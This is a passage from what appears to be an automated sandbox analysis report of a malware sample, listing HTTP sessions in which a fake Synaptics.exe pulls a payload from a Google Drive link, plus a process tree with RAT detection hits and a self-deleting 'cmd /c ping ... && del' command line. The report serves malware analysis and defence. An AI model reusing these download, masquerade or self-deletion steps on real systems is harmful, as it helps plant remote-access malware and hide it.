                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eJq0LgvZtHNChAS8SqFoMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        62192.168.2.449926142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        63192.168.2.449941142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC66x_MxidOmmNANaz9iYvtr0igAuuex2lwF4JMkbTu94-5hRid4vrbCl1wRLk4KmvRn
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:16 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-z-hLb-I4gArl8Y4iv00V_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:16 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:12:16 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 6d 49 65 58 53 4d 4d 78 35 38 38 44 71 68 2d 71 41 30 54 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="lmIeXSMMx588Dqh-qA0TNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:12:16 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        64192.168.2.449942142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7v5oCN09FNRVxhjUA_E3jyzlK8yNjGyzckvBgYexjigbDxpvA1vfBAyT27UgQtZ_w7Hp03Pp8
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:15 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kzxPUoPJWQ3bRNi8l_H09Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:12:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 46 61 4c 7a 50 41 4d 76 34 52 36 73 58 74 6e 77 52 61 7a 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="1FaLzPAMv4R6sXtnwRazLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:12:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        65192.168.2.449944142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:15 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:15 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dohjq_-Md1YHm5k9bfW5OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        66192.168.2.449943142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:15 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:16 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:15 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bOJ-SqtlRolhRvrpRBUaGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:16:10:59
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\Desktop\blq.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\blq.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:820'736 bytes
                                                                                        MD5 hash:6153A06B74491BACB664BF142B598C69
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:16:10:59
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\Desktop\._cache_blq.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\._cache_blq.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:49'152 bytes
                                                                                        MD5 hash:2C8E6B45F0113B45F9187B60DF114FEF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: 00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Joe Security
                                                                                        • Rule: GoldDragon_RunningRAT, Description: Detects Running RAT from Gold Dragon report, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Florian Roth
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                                                                                        Imagebase:0x830000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\svchost.exe -k "encvbk"
                                                                                        Imagebase:0x830000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:16:11:00
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                        Imagebase:0x430000
                                                                                        File size:53'161'064 bytes
                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:16:11:02
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:16:11:02
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:16:11:02
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:ping 127.0.0.1 -n 1
                                                                                        Imagebase:0x9d0000
                                                                                        File size:18'944 bytes
                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:16:11:03
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:16:11:04
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\encvbk.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\encvbk.exe "c:\program files (x86)\6795234.dll",MainThread
                                                                                        Imagebase:0xdd0000
                                                                                        File size:61'440 bytes
                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: 0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:16:11:13
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:16:12:16
                                                                                        Start date:24/12/2024
